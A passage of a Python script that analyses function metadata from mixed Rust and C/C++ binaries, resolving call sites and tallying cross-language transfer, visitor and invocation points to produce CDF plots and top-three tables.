 612 |                             print("Error: Call site " + str(cs) + " has no language information.") 
 613 |                     else:
 614 |                         # TODO: Objdump called functions plus offsets, need to add it as a function or remove it from the call sites list
 615 |                         # Temporary solution: just remove functions with offsets from call sites list
 616 |                         if '+0x' in str(cs):
 617 |                             print("Removing " + str(cs) + " as a call site...") 
 618 |                             md[fn]["call_sites"].remove(cs)
 619 |                         else:
 620 |                             # Temporary solution 2: find plt calls
 621 |                             found = False
 622 |                             if "@plt" in cs:
 623 |                                 stripped_name = str(cs).split('@')[0]
 624 | 
 625 |                                 # If the plt function exists in the metadata, replace the plt call site with the real function
 626 |                                 for newcs in md.keys():
 627 |                                     if newcs.startswith(stripped_name) and not found:
 628 |                                         md[fn]["call_sites"].remove(cs)
 629 |                                         md[fn]["call_sites"].append(newcs)
 630 | 
 631 |                                         # Same as above but with newcs instead of cs
 632 |                                         if "lang" in md[newcs]:
 633 |                                             if md[newcs]["lang"] != md[fn]["lang"]:
 634 | 
 635 |                                                 ### transfer points
 636 |                                                 # Creates a transfer points metadata field to an already seen function
 637 |                                                 if "transfer_points" not in md[fn]:
 638 |                                                     md[fn]["transfer_points"] = [newcs]
 639 | 
 640 |                                                 # Appends metadata to an already seen transfer points list for a function
 641 |                                                 else:
 642 |                                                     tmp = md[fn]["transfer_points"]
 643 |                                                     tmp_set = set(tmp)
 644 |                                                     tmp_set = tmp_set.union(set([newcs]))
 645 |                                                     md[fn]["transfer_points"] = list(tmp_set)
 646 | 
 647 |                                                 ### visitor points 
 648 |                                                 # Creates a visitor points metadata field to an already seen function
 649 |                                                 if "visitor_points" not in md[newcs]:
 650 |                                                     md[newcs]["visitor_points"] = [fn]
 651 | 
 652 |                                                 # Appends metadata to an already seen transfer points list for a function
 653 |                                                 else:
 654 |                                                     tmp = md[newcs]["visitor_points"]
 655 |                                                     tmp_set = set(tmp)
 656 |                                                     tmp_set = tmp_set.union(set([fn]))
 657 |                                                     md[newcs]["visitor_points"] = list(tmp_set)
 658 | 
 659 |                                         else:
 660 |                                             print("Error: Call site " + str(newcs) + " has no language information.") 
 661 | 
 662 |                                         found = True
 663 | 
 664 |                                 # If the plt function is not in the metadata, add the plt call site to the metadata 
 665 |                                 if not found:
 666 |                                     found = True
 667 | 
 668 |                                     if "_Z" in cs:
 669 |                                         t = "unknown"
 670 |                                         l = "c++"
 671 |                                     else:
 672 |                                         t = "external"
 673 |                                         l = "c"
 674 | 
 675 |                                     md[cs] = {
 676 |                                             "addr": "unknown",
 677 |                                             "type": t,
 678 |                                             "lang": l,
 679 |                                             "call_sites": [],
 680 |                                             "num_indirect_calls": float(0),
 681 |                                             "num_dynamic_calls": float(0),
 682 |                                             }
 683 | 
 684 |                                     if "lang" in md[cs]:
 685 |                                         if md[cs]["lang"] != md[fn]["lang"]:
 686 | 
 687 |                                             ### transfer points
 688 |                                             # Creates a transfer points metadata field to an already seen function
 689 |                                             if "transfer_points" not in md[fn]:
 690 |                                                 md[fn]["transfer_points"] = [cs]
 691 | 
 692 |                                             # Appends metadata to an already seen transfer points list for a function
 693 |                                             else:
 694 |                                                 tmp = md[fn]["transfer_points"]
 695 |                                                 tmp_set = set(tmp)
 696 |                                                 tmp_set = tmp_set.union(set([cs]))
 697 |                                                 md[fn]["transfer_points"] = list(tmp_set)
 698 | 
 699 |                                             ### visitor points 
 700 |                                             # Creates a visitor points metadata field to an already seen function
 701 |                                             if "visitor_points" not in md[cs]:
 702 |                                                 md[cs]["visitor_points"] = [fn]
 703 | 
 704 |                                             # Appends metadata to an already seen transfer points list for a function
 705 |                                             else:
 706 |                                                 tmp = md[cs]["visitor_points"]
 707 |                                                 tmp_set = set(tmp)
 708 |                                                 tmp_set = tmp_set.union(set([fn]))
 709 |                                                 md[cs]["visitor_points"] = list(tmp_set)
 710 | 
 711 |                             if not found:
 712 |                                 print("Error: Call site " + str(cs) + " does not exist in metadata.") 
 713 |                                 print("...removing as a call site...")
 714 |                                 md[fn]["call_sites"].remove(cs)
 715 |             else:
 716 |                 print("Error: Function " + str(fn) + " either has no call sites field or no language information field.") 
 717 | 
 718 |         print("Adding size of call sites, transfer points, and visitor points lists...")
 719 |         for fn in md.keys():
 720 |             if "call_sites" in md[fn]:
 721 |                 md[fn]["num_call_sites"] = len(md[fn]["call_sites"])
 722 |             else:
 723 |                 md[fn]["call_sites"] = []
 724 |                 md[fn]["num_call_sites"] = float(0)
 725 | 
 726 |             if "transfer_points" in md[fn]:
 727 |                 md[fn]["num_transfer_points"] = len(md[fn]["transfer_points"])
 728 |             else:
 729 |                 md[fn]["transfer_points"] = []
 730 |                 md[fn]["num_transfer_points"] = float(0)
 731 | 
 732 |             if "visitor_points" in md[fn]:
 733 |                 md[fn]["num_visitor_points"] = len(md[fn]["visitor_points"])
 734 |             else:
 735 |                 md[fn]["visitor_points"] = []
 736 |                 md[fn]["num_visitor_points"] = float(0)
 737 | 
 738 |         print("Saving metadata with transfer and visitor points...")
 739 |         f = open("output/metadata_with_tps.json", "w")
 740 |         json.dump(md, f, indent=4)
 741 | 
 742 | def get_invocation_points():
 743 |     print("Opening metadata to find invocation points...")
 744 |     with open("output/metadata_with_tps.json") as mj:
 745 |         md = json.load(mj)
 746 | 
 747 |         # For each function, get a list of which functions call other functions 
 748 |         print("Iterating through metadata functions...")
 749 |         for fn in md.keys():
 750 | 
 751 |             for cs in md[fn]["call_sites"]:
 752 | 
 753 |                 if cs in md:
 754 | 
 755 |                     ### invocation points
 756 |                     # Creates a invocation points metadata field to an already seen function
 757 |                     if "invocation_points" not in md[cs]:
 758 |                         md[cs]["invocation_points"] = [fn]
 759 | 
 760 |                     # Appends metadata to an already seen transfer points list for a function
 761 |                     else:
 762 |                         tmp = md[cs]["invocation_points"]
 763 |                         tmp_set = set(tmp)
 764 |                         tmp_set = tmp_set.union(set([fn]))
 765 |                         md[cs]["invocation_points"] = list(tmp_set)
 766 |                 else:
 767 |                     print("Error: " + str(cs) + " does not exist in the metadata.")
 768 | 
 769 |         for fn in md.keys():
 770 |             if "invocation_points" not in md[fn]:
 771 |                 md[fn]["invocation_points"] = []
 772 | 
 773 |             md[fn]["num_invocations"] = float(len(md[fn]["invocation_points"]))
 774 | 
 775 |         print("Saving metadata with invocation points...")
 776 |         f = open("output/metadata_with_invos.json", "w")
 777 |         json.dump(md, f, indent=4)
 778 | 
 779 | 
 780 | def generate_cdfs():
 781 |     print("Setting plot params...")
 782 |     plt.style.use('ggplot')
 783 | 
 784 |     plt.rcParams['figure.titlesize'] = 20
 785 |     plt.rcParams['axes.labelsize'] = 16
 786 |     plt.rcParams['axes.titlesize'] = 16
 787 |     plt.rcParams['xtick.labelsize'] = 14
 788 |     plt.rcParams['ytick.labelsize'] = 14
 789 |     plt.rcParams['legend.fontsize'] = 16
 790 |     plt.rcParams['axes.grid'] = 'true'
 791 |     plt.rcParams['grid.color'] = '0.45'
 792 |     plt.rcParams['axes.facecolor'] = '0.95'
 793 | 
 794 |     # with_invos is the json metadata file with the most data
 795 |     print("Loading metadata to generate cdfs...")
 796 |     with open("output/metadata_with_invos.json") as mj:
 797 |         md = json.load(mj)
 798 | 
 799 |         ### CDFs
 800 |         ## Make a CDF for number of indirect calls
 801 |         both_indirs = []
 802 |         rust_indirs = []
 803 |         c_indirs = []
 804 | 
 805 |         ## Make a CDF for number of dynamic calls
 806 |         both_dynamics = []
 807 |         rust_dynamics = []
 808 |         c_dynamics = []
 809 | 
 810 | 
 811 |         ## Make a CDF for number of call sites
 812 |         both_cs = []
 813 |         rust_cs = []
 814 |         c_cs = []
 815 | 
 816 |         ## Make a CDF for number of visitor points
 817 |         both_vps = []
 818 |         rust_vps = []
 819 |         c_vps = []
 820 | 
 821 |         ## Make a CDF for number of invocation points 
 822 |         both_invos = []
 823 |         rust_invos = []
 824 |         c_invos = []
 825 | 
 826 |         ## Make a CDF for number of transfer points
 827 |         both_tps = []
 828 |         rust_tps = []
 829 |         c_tps = []
 830 | 
 831 |         ### Table values
 832 |         ## Table value of total number of functions
 833 |         both_fns = 0
 834 |         rust_fns = 0
 835 |         c_fns = 0
 836 | 
 837 |         ## Table value of total number of invocations
 838 |         both_total_indirs = 0
 839 |         rust_total_indirs = 0
 840 |         c_total_indirs = 0
 841 | 
 842 |         ## Table value of total number of invocations
 843 |         both_total_dynamics = 0
 844 |         rust_total_dynamics = 0
 845 |         c_total_dynamics = 0
 846 | 
 847 |         ## Table value of total number of invocations
 848 |         both_total_cs = 0
 849 |         rust_total_cs = 0
 850 |         c_total_cs = 0
 851 | 
 852 |         ## Table value of total number of invocations
 853 |         both_total_vps = 0
 854 |         rust_total_vps = 0
 855 |         c_total_vps = 0
 856 | 
 857 |         ## Table value of total number of invocations
 858 |         both_total_invos = 0
 859 |         rust_total_invos = 0
 860 |         c_total_invos = 0
 861 | 
 862 |         ## Table value of total number of invocations
 863 |         both_total_tps = 0
 864 |         rust_total_tps = 0
 865 |         c_total_tps = 0
 866 | 
 867 |         ## Table value of total number of closures
 868 |         rust_closures = 0
 869 | 
 870 |         ## Table value of total number of monomorphized functions
 871 |         rust_monos = 0
 872 | 
 873 |         ## Largest Degree Call sites 
 874 |         both_top_cs = {
 875 |                 "first": {
 876 |                     "name": "unknown",
 877 |                     "num": 0
 878 |                     },
 879 |                 "second": {
 880 |                     "name": "unknown",
 881 |                     "num": 0
 882 |                     },
 883 |                 "third": {
 884 |                     "name": "unknown",
 885 |                     "num": 0
 886 |                     },
 887 |                 }
 888 |         rust_top_cs = {
 889 |                 "first": {
 890 |                     "name": "unknown",
 891 |                     "num": 0
 892 |                     },
 893 |                 "second": {
 894 |                     "name": "unknown",
 895 |                     "num": 0
 896 |                     },
 897 |                 "third": {
 898 |                     "name": "unknown",
 899 |                     "num": 0
 900 |                     },
 901 |                 }
 902 |         c_top_cs = {
 903 |                 "first": {
 904 |                     "name": "unknown",
 905 |                     "num": 0
 906 |                     },
 907 |                 "second": {
 908 |                     "name": "unknown",
 909 |                     "num": 0
 910 |                     },
 911 |                 "third": {
 912 |                     "name": "unknown",
 913 |                     "num": 0
 914 |                     },
 915 |                 }
 916 | 
 917 |         ## Largest Degree Invocations 
 918 |         both_top_invos = {
 919 |                 "first": {
 920 |                     "name": "unknown",
 921 |                     "num": 0
 922 |                     },
 923 |                 "second": {
 924 |                     "name": "unknown",
 925 |                     "num": 0
 926 |                     },
 927 |                 "third": {
 928 |                     "name": "unknown",
 929 |                     "num": 0
 930 |                     },
 931 |                 }
 932 |         rust_top_invos = {
 933 |                 "first": {
 934 |                     "name": "unknown",
 935 |                     "num": 0
 936 |                     },
 937 |                 "second": {
 938 |                     "name": "unknown",
 939 |                     "num": 0
 940 |                     },
 941 |                 "third": {
 942 |                     "name": "unknown",
 943 |                     "num": 0
 944 |                     },
 945 |                 }
 946 |         c_top_invos = {
 947 |                 "first": {
 948 |                     "name": "unknown",
 949 |                     "num": 0
 950 |                     },
 951 |                 "second": {
 952 |                     "name": "unknown",
 953 |                     "num": 0
 954 |                     },
 955 |                 "third": {
 956 |                     "name": "unknown",
 957 |                     "num": 0
 958 |                     },
 959 |                 }
 960 | 
 961 |         ## Largest Degree Transfer Points 
 962 |         both_top_tps = {
 963 |                 "first": {
 964 |                     "name": "unknown",
 965 |                     "num": 0
 966 |                     },
 967 |                 "second": {
 968 |                     "name": "unknown",
 969 |                     "num": 0
 970 |                     },
 971 |                 "third": {
 972 |                     "name": "unknown",
 973 |                     "num": 0
 974 |                     },
 975 |                 }
 976 |         rust_top_tps = {
 977 |                 "first": {
 978 |                     "name": "unknown",
 979 |                     "num": 0
 980 |                     },
 981 |                 "second": {
 982 |                     "name": "unknown",
 983 |                     "num": 0
 984 |                     },
 985 |                 "third": {
 986 |                     "name": "unknown",
 987 |                     "num": 0
 988 |                     },
 989 |                 }
 990 |         c_top_tps = {
 991 |                 "first": {
 992 |                     "name": "unknown",
 993 |                     "num": 0
 994 |                     },
 995 |                 "second": {
 996 |                     "name": "unknown",
 997 |                     "num": 0
 998 |                     },
 999 |                 "third": {
1000 |                     "name": "unknown",
1001 |                     "num": 0
1002 |                     },
1003 |                 }
1004 | 
1005 |         ## Largest Degree Visitor Points 
1006 |         both_top_vps = {
1007 |                 "first": {
1008 |                     "name": "unknown",
1009 |                     "num": 0
1010 |                     },
1011 |                 "second": {
1012 |                     "name": "unknown",
1013 |                     "num": 0
1014 |                     },
1015 |                 "third": {
1016 |                     "name": "unknown",
1017 |                     "num": 0
1018 |                     },
1019 |                 }
1020 |         rust_top_vps = {
1021 |                 "first": {
1022 |                     "name": "unknown",
1023 |                     "num": 0
1024 |                     },
1025 |                 "second": {
1026 |                     "name": "unknown",
1027 |                     "num": 0
1028 |                     },
1029 |                 "third": {
1030 |                     "name": "unknown",
1031 |                     "num": 0
1032 |                     },
1033 |                 }
1034 |         c_top_vps = {
1035 |                 "first": {
1036 |                     "name": "unknown",
1037 |                     "num": 0
1038 |                     },
1039 |                 "second": {
1040 |                     "name": "unknown",
1041 |                     "num": 0
1042 |                     },
1043 |                 "third": {
1044 |                     "name": "unknown",
1045 |                     "num": 0
1046 |                     },
1047 |                 }
1048 | 
1049 | 
1050 |         print("Looping through metadata to collect graph data...")
1051 |         for name in md.keys():
1052 | 
1053 |             if md[name]["lang"] == "rust":
1054 |                 try: 
1055 |                     rust_indirs.append(float(md[name]["num_indirect_calls"]))
1056 |                     rust_dynamics.append(float(md[name]["num_dynamic_calls"]))
1057 |                     rust_cs.append(float(md[name]["num_call_sites"]))
1058 |                     rust_tps.append(float(md[name]["num_transfer_points"]))
1059 |                     rust_vps.append(float(md[name]["num_visitor_points"]))
1060 |                     rust_invos.append(float(md[name]["num_invocations"]))
1061 | 
1062 |                     rust_fns = rust_fns + 1
1063 | 
1064 |                     rust_total_indirs = rust_total_indirs + float(md[name]["num_indirect_calls"])
1065 |                     rust_total_dynamics = rust_total_dynamics + float(md[name]["num_dynamic_calls"])
1066 |                     rust_total_cs = rust_total_cs + float(md[name]["num_call_sites"])
1067 |                     rust_total_tps = rust_total_tps + float(md[name]["num_transfer_points"])
1068 |                     rust_total_vps = rust_total_vps + float(md[name]["num_visitor_points"])
1069 |                     rust_total_invos = rust_total_invos + float(md[name]["num_invocations"])
1070 | 
1071 |                     #if md[name]["type"] == "closure":
1072 |                         #rust_closures = rust_closures + 1
1073 |                     #if md[name]["type"] == "static":
1074 |                         #rust_monos = rust_monos + 1
1075 |                     if "_R" in name:
1076 |                         mangled = False
1077 |                         if sum(1 for c in name if c.isupper()) > 1:
1078 |                             mangled = True
1079 | 
1080 |                         if mangled:
1081 |                             if "CN" in name:
1082 |                                 rust_closures = rust_closures + 1
1083 |                             elif "IN" in name:
1084 |                                 rust_monos = rust_monos + 1
1085 |                             elif "X" in name:
1086 |                                 rust_monos = rust_monos + 1
1087 |                             elif "M" in name:
1088 |                                 rust_monos = rust_monos + 1
1089 | 
1090 |                     ## Check top call sites
1091 |                     if float(md[name]["num_call_sites"]) > float(rust_top_cs["first"]["num"]):
1092 |                         #print("Found new top leader")
1093 |                         #print(md[name]["num_call_sites"])
1094 |                         #print(rust_top_cs)
1095 | 
1096 |                         # Get tmps
1097 |                         tmp1 = {
1098 |                                 "name": rust_top_cs["first"]["name"],
1099 |                                 "num": rust_top_cs["first"]["num"],
1100 |                                 }
1101 |                         tmp2 = {
1102 |                                 "name": rust_top_cs["second"]["name"],
1103 |                                 "num": rust_top_cs["second"]["num"],
1104 |                                 }
1105 | 
1106 |                         #print(tmp1)
1107 |                         #print(tmp2)
1108 | 
1109 |                         # Set the new leader
1110 |                         rust_top_cs["first"]["name"] = str(name)
1111 |                         rust_top_cs["first"]["num"] = float(md[name]["num_call_sites"])
1112 | 
1113 |                         #print(tmp1)
1114 |                         #print(tmp2)
1115 | 
1116 |                         # Move down
1117 |                         rust_top_cs["second"] = tmp1
1118 |                         rust_top_cs["third"] = tmp2
1119 | 
1120 |                     elif float(md[name]["num_call_sites"]) > float(rust_top_cs["second"]["num"]):
1121 |                         # Get tmps
1122 |                         tmp2 = {
1123 |                                 "name": rust_top_cs["second"]["name"],
1124 |                                 "num": rust_top_cs["second"]["num"],
1125 |                                 }
1126 | 
1127 |                         # Set the new leader
1128 |                         rust_top_cs["second"]["name"] = str(name)
1129 |                         rust_top_cs["second"]["num"] = float(md[name]["num_call_sites"])
1130 | 
1131 |                         # Move down
1132 |                         rust_top_cs["third"] = tmp2
1133 | 
1134 |                     elif float(md[name]["num_call_sites"]) > float(rust_top_cs["third"]["num"]):
1135 |                         # Set the new leader
1136 |                         rust_top_cs["third"]["name"] = str(name)
1137 |                         rust_top_cs["third"]["num"] = float(md[name]["num_call_sites"])
1138 | 
1139 |                     ## Check top invocations 
1140 |                     if float(md[name]["num_invocations"]) > float(rust_top_invos["first"]["num"]):
1141 |                         # Get tmps
1142 |                         tmp1 = {
1143 |                                 "name": rust_top_invos["first"]["name"],
1144 |                                 "num": rust_top_invos["first"]["num"],
1145 |                                 }
1146 |                         tmp2 = {
1147 |                                 "name": rust_top_invos["second"]["name"],
1148 |                                 "num": rust_top_invos["second"]["num"],
1149 |                                 }
1150 | 
1151 |                         # Set the new leader
1152 |                         rust_top_invos["first"]["name"] = str(name)
1153 |                         rust_top_invos["first"]["num"] = float(md[name]["num_invocations"])
1154 | 
1155 |                         # Move down
1156 |                         rust_top_invos["second"] = tmp1
1157 |                         rust_top_invos["third"] = tmp2
1158 | 
1159 |                     elif float(md[name]["num_invocations"]) > float(rust_top_invos["second"]["num"]):
1160 |                         # Get tmps
1161 |                         tmp2 = rust_top_invos["second"]
1162 |                         tmp2 = {
1163 |                                 "name": rust_top_invos["second"]["name"],
1164 |                                 "num": rust_top_invos["second"]["num"],
1165 |                                 }
1166 | 
1167 |                         # Set the new leader
1168 |                         rust_top_invos["second"]["name"] = str(name)
1169 |                         rust_top_invos["second"]["num"] = float(md[name]["num_invocations"])
1170 | 
1171 |                         # Move down
1172 |                         rust_top_invos["third"] = tmp2
1173 | 
1174 |                     elif float(md[name]["num_invocations"]) > float(rust_top_invos["third"]["num"]):
1175 |                         # Set the new leader
1176 |                         rust_top_invos["third"]["name"] = str(name)
1177 |                         rust_top_invos["third"]["num"] = float(md[name]["num_invocations"])
1178 | 
1179 |                     ## Check top Transfer Points
1180 |                     if float(md[name]["num_transfer_points"]) > float(rust_top_tps["first"]["num"]):
1181 |                         # Get tmps
1182 |                         tmp1 = {
1183 |                                 "name": rust_top_tps["first"]["name"],
1184 |                                 "num": rust_top_tps["first"]["num"],
1185 |                                 }
1186 |                         tmp2 = {
1187 |                                 "name": rust_top_tps["second"]["name"],
1188 |                                 "num": rust_top_tps["second"]["num"],
1189 |                                 }
1190 | 
1191 |                         # Set the new leader
1192 |                         rust_top_tps["first"]["name"] = str(name)
1193 |                         rust_top_tps["first"]["num"] = float(md[name]["num_transfer_points"])
1194 | 
1195 |                         # Move down
1196 |                         rust_top_tps["second"] = tmp1
1197 |                         rust_top_tps["third"] = tmp2
1198 | 
1199 |                     elif float(md[name]["num_transfer_points"]) > float(rust_top_tps["second"]["num"]):
1200 |                         # Get tmps
1201 |                         tmp2 = rust_top_tps["second"]
1202 |                         tmp2 = {
1203 |                                 "name": rust_top_tps["second"]["name"],
1204 |                                 "num": rust_top_tps["second"]["num"],
1205 |                                 }
1206 | 
1207 |                         # Set the new leader
1208 |                         rust_top_tps["second"]["name"] = str(name)
1209 |                         rust_top_tps["second"]["num"] = float(md[name]["num_transfer_points"])
1210 | 
1211 |                         # Move down
1212 |                         rust_top_tps["third"] = tmp2
1213 | 
1214 |                     elif float(md[name]["num_transfer_points"]) > float(rust_top_tps["third"]["num"]):
1215 |                         # Set the new leader
1216 |                         rust_top_tps["third"]["name"] = str(name)
1217 |                         rust_top_tps["third"]["num"] = float(md[name]["num_transfer_points"])
1218 | 
1219 |                     ## Check top invocations 
1220 |                     if float(md[name]["num_visitor_points"]) > float(rust_top_vps["first"]["num"]):
1221 |                         # Get tmps
1222 |                         tmp1 = {
1223 |                                 "name": rust_top_vps["first"]["name"],
1224 |                                 "num": rust_top_vps["first"]["num"],
1225 |                                 }
1226 |                         tmp2 = {
1227 |                                 "name": rust_top_vps["second"]["name"],
1228 |                                 "num": rust_top_vps["second"]["num"],
1229 |                                 }
1230 | 
1231 |                         # Set the new leader
1232 |                         rust_top_vps["first"]["name"] = str(name)
1233 |                         rust_top_vps["first"]["num"] = float(md[name]["num_visitor_points"])
1234 | 
1235 |                         # Move down
1236 |                         rust_top_vps["second"] = tmp1
1237 |                         rust_top_vps["third"] = tmp2
1238 | 
1239 |                     elif float(md[name]["num_visitor_points"]) > float(rust_top_vps["second"]["num"]):
1240 |                         # Get tmps
1241 |                         tmp2 = {
1242 |                                 "name": rust_top_vps["second"]["name"],
1243 |                                 "num": rust_top_vps["second"]["num"],
1244 |                                 }
1245 | 
1246 |                         # Set the new leader
1247 |                         rust_top_vps["second"]["name"] = str(name)
1248 |                         rust_top_vps["second"]["num"] = float(md[name]["num_visitor_points"])
1249 | 
1250 |                         # Move down
1251 |                         rust_top_vps["third"] = tmp2
1252 | 
1253 |                     elif float(md[name]["num_visitor_points"]) > float(rust_top_vps["third"]["num"]):
1254 |                         # Set the new leader
1255 |                         rust_top_vps["third"]["name"] = str(name)
1256 |                         rust_top_vps["third"]["num"] = float(md[name]["num_visitor_points"])
1257 | 
1258 |                 except Exception as e:
1259 |                     print(e)
1260 | 
1261 |             #elif md[name]["lang"] == "c" or md[name]["lang"] == "c++":
1262 |             else:
1263 |                 try: 
1264 |                     c_indirs.append(float(md[name]["num_indirect_calls"]))
1265 |                     c_dynamics.append(float(md[name]["num_dynamic_calls"]))
1266 |                     c_cs.append(float(md[name]["num_call_sites"]))
1267 |                     c_tps.append(float(md[name]["num_transfer_points"]))
1268 |                     c_vps.append(float(md[name]["num_visitor_points"]))
1269 |                     c_invos.append(float(md[name]["num_invocations"]))
1270 | 
1271 |                     c_fns = c_fns + 1
1272 | 
1273 |                     c_total_indirs = c_total_indirs + float(md[name]["num_indirect_calls"])
1274 |                     c_total_dynamics = c_total_dynamics + float(md[name]["num_dynamic_calls"])
1275 |                     c_total_cs = c_total_cs + float(md[name]["num_call_sites"])
1276 |                     c_total_tps = c_total_tps + float(md[name]["num_transfer_points"])
1277 |                     c_total_vps = c_total_vps + float(md[name]["num_visitor_points"])
1278 |                     c_total_invos = c_total_invos + float(md[name]["num_invocations"])
1279 | 
1280 |                     ## Check top call sites
1281 |                     if float(md[name]["num_call_sites"]) > float(c_top_cs["first"]["num"]):
1282 |                         # Get tmps
1283 |                         tmp1 = {
1284 |                                 "name": c_top_cs["first"]["name"],
1285 |                                 "num": c_top_cs["first"]["num"],
1286 |                                 }
1287 |                         tmp2 = {
1288 |                                 "name": c_top_cs["second"]["name"],
1289 |                                 "num": c_top_cs["second"]["num"],
1290 |                                 }
1291 | 
1292 |                         # Set the new leader
1293 |                         c_top_cs["first"]["name"] = str(name)
1294 |                         c_top_cs["first"]["num"] = float(md[name]["num_call_sites"])
1295 | 
1296 |                         # Move down
1297 |                         c_top_cs["second"] = tmp1
1298 |                         c_top_cs["third"] = tmp2
1299 | 
1300 |                     elif float(md[name]["num_call_sites"]) > float(c_top_cs["second"]["num"]):
1301 |                         # Get tmps
1302 |                         tmp2 = {
1303 |                                 "name": c_top_cs["second"]["name"],
1304 |                                 "num": c_top_cs["second"]["num"],
1305 |                                 }
1306 | 
1307 |                         # Set the new leader
1308 |                         c_top_cs["second"]["name"] = str(name)
1309 |                         c_top_cs["second"]["num"] = float(md[name]["num_call_sites"])
1310 | 
1311 |                         # Move down
1312 |                         c_top_cs["third"] = tmp2
1313 | 
1314 |                     elif float(md[name]["num_call_sites"]) > float(c_top_cs["third"]["num"]):
1315 |                         # Set the new leader
1316 |                         c_top_cs["third"]["name"] = str(name)
1317 |                         c_top_cs["third"]["num"] = float(md[name]["num_call_sites"])
1318 | 
1319 |                     ## Check top invocations 
1320 |                     if float(md[name]["num_invocations"]) > float(c_top_invos["first"]["num"]):
1321 |                         # Get tmps
1322 |                         tmp1 = {
1323 |                                 "name": c_top_invos["first"]["name"],
1324 |                                 "num": c_top_invos["first"]["num"],
1325 |                                 }
1326 |                         tmp2 = {
1327 |                                 "name": c_top_invos["second"]["name"],
1328 |                                 "num": c_top_invos["second"]["num"],
1329 |                                 }
1330 | 
1331 |                         # Set the new leader
1332 |                         c_top_invos["first"]["name"] = str(name)
1333 |                         c_top_invos["first"]["num"] = float(md[name]["num_invocations"])
1334 | 
1335 |                         # Move down
1336 |                         c_top_invos["second"] = tmp1
1337 |                         c_top_invos["third"] = tmp2
1338 | 
1339 |                     elif float(md[name]["num_invocations"]) > float(c_top_invos["second"]["num"]):
1340 |                         # Get tmps
1341 |                         tmp2 = {
1342 |                                 "name": c_top_invos["second"]["name"],
1343 |                                 "num": c_top_invos["second"]["num"],
1344 |                                 }
1345 | 
1346 |                         # Set the new leader
1347 |                         c_top_invos["second"]["name"] = str(name)
1348 |                         c_top_invos["second"]["num"] = float(md[name]["num_invocations"])
1349 | 
1350 |                         # Move down
1351 |                         c_top_invos["third"] = tmp2
1352 | 
1353 |                     elif float(md[name]["num_invocations"]) > float(c_top_invos["third"]["num"]):
1354 |                         # Set the new leader
1355 |                         c_top_invos["third"]["name"] = str(name)
1356 |                         c_top_invos["third"]["num"] = float(md[name]["num_invocations"])
1357 | 
1358 |                     ## Check top Transfer Points
1359 |                     if float(md[name]["num_transfer_points"]) > float(c_top_tps["first"]["num"]):
1360 |                         # Get tmps
1361 |                         tmp1 = {
1362 |                                 "name": c_top_tps["first"]["name"],
1363 |                                 "num": c_top_tps["first"]["num"],
1364 |                                 }
1365 |                         tmp2 = {
1366 |                                 "name": c_top_tps["second"]["name"],
1367 |                                 "num": c_top_tps["second"]["num"],
1368 |                                 }
1369 | 
1370 |                         # Set the new leader
1371 |                         c_top_tps["first"]["name"] = str(name)
1372 |                         c_top_tps["first"]["num"] = float(md[name]["num_transfer_points"])
1373 | 
1374 |                         # Move down
1375 |                         c_top_tps["second"] = tmp1
1376 |                         c_top_tps["third"] = tmp2
1377 | 
1378 |                     elif float(md[name]["num_transfer_points"]) > float(c_top_tps["second"]["num"]):
1379 |                         # Get tmps
1380 |                         tmp2 = {
1381 |                                 "name": c_top_tps["second"]["name"],
1382 |                                 "num": c_top_tps["second"]["num"],
1383 |                                 }
1384 | 
1385 |                         # Set the new leader
1386 |                         c_top_tps["second"]["name"] = str(name)
1387 |                         c_top_tps["second"]["num"] = float(md[name]["num_transfer_points"])
1388 | 
1389 |                         # Move down
1390 |                         c_top_tps["third"] = tmp2
1391 | 
1392 |                     elif float(md[name]["num_transfer_points"]) > float(c_top_tps["third"]["num"]):
1393 |                         # Set the new leader
1394 |                         c_top_tps["third"]["name"] = str(name)
1395 |                         c_top_tps["third"]["num"] = float(md[name]["num_transfer_points"])
1396 | 
1397 |                     ## Check top invocations 
1398 |                     if float(md[name]["num_visitor_points"]) > float(c_top_vps["first"]["num"]):
1399 |                         # Get tmps
1400 |                         tmp1 = {
1401 |                                 "name": c_top_vps["first"]["name"],
1402 |                                 "num": c_top_vps["first"]["num"],
1403 |                                 }
1404 |                         tmp2 = {
1405 |                                 "name": c_top_vps["second"]["name"],
1406 |                                 "num": c_top_vps["second"]["num"],
1407 |                                 }
1408 | 
1409 |                         # Set the new leader
1410 |                         c_top_vps["first"]["name"] = str(name)
1411 |                         c_top_vps["first"]["num"] = float(md[name]["num_visitor_points"])
1412 | 
1413 |                         # Move down
1414 |                         c_top_vps["second"] = tmp1
1415 |                         c_top_vps["third"] = tmp2
1416 | 
1417 |                     elif float(md[name]["num_visitor_points"]) > float(c_top_vps["second"]["num"]):
1418 |                         # Get tmps
1419 |                         tmp2 = {
1420 |                                 "name": c_top_vps["second"]["name"],
1421 |                                 "num": c_top_vps["second"]["num"],
1422 |                                 }
1423 | 
1424 |                         # Set the new leader
1425 |                         c_top_vps["second"]["name"] = str(name)
1426 |                         c_top_vps["second"]["num"] = float(md[name]["num_visitor_points"])
1427 | 
1428 |                         # Move down
1429 |                         c_top_vps["third"] = tmp2
1430 | 
1431 |                     elif float(md[name]["num_visitor_points"]) > float(c_top_vps["third"]["num"]):
1432 |                         # Set the new leader
1433 |                         c_top_vps["third"]["name"] = str(name)
1434 |                         c_top_vps["third"]["num"] = float(md[name]["num_visitor_points"])
1435 | 
1436 |                 except Exception as e:
1437 |                     print(e)
1438 | 
1439 |             try: 
1440 |                 both_indirs.append(float(md[name]["num_indirect_calls"]))
1441 |                 both_dynamics.append(float(md[name]["num_dynamic_calls"]))
1442 |                 both_cs.append(float(md[name]["num_call_sites"]))
1443 |                 both_tps.append(float(md[name]["num_transfer_points"]))
1444 |                 both_vps.append(float(md[name]["num_visitor_points"]))
1445 |                 both_invos.append(float(md[name]["num_invocations"]))
1446 | 
1447 |                 both_fns = both_fns + 1
1448 | 
1449 |                 both_total_indirs = both_total_indirs + float(md[name]["num_indirect_calls"])
1450 |                 both_total_dynamics = both_total_dynamics + float(md[name]["num_dynamic_calls"])
1451 |                 both_total_cs = both_total_cs + float(md[name]["num_call_sites"])
1452 |                 both_total_tps = both_total_tps + float(md[name]["num_transfer_points"])
1453 |                 both_total_vps = both_total_vps + float(md[name]["num_visitor_points"])
1454 |                 both_total_invos = both_total_invos + float(md[name]["num_invocations"])
1455 | 
1456 |                 ## Check top call sites
1457 |                 if float(md[name]["num_call_sites"]) > float(both_top_cs["first"]["num"]):
1458 |                     # Get tmps
1459 |                     tmp1 = both_top_cs["first"]
1460 |                     tmp2 = both_top_cs["second"]
1461 |                     tmp1 = {
1462 |                             "name": both_top_cs["first"]["name"],
1463 |                             "num": both_top_cs["first"]["num"],
1464 |                             }
